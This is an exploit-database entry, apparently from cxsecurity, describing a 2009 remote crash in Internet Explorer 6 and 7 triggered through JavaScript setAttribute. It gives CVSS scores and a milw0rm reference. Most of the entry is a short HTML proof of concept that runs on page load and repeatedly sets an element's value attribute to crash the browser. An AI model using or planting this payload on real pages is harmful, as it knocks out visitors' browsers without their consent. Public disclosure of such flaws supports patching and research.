MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit

2009-09-01 / 2009-09-02
Credit: Irfan Asrar
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<html> <head> <title> Irfan Asrar</title> </head> <body onload="c()"> Set Attribute Crash : Tested with IE7 Vista IE6 XP2 IE6 XP3 <script type="text/javascript"> function c() { var li = document.createElement("li"); li.setAttribute("value", "1"); li.value = "1"; } </script> </body> </html>

References:

http://www.milw0rm.com/exploits/9455


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top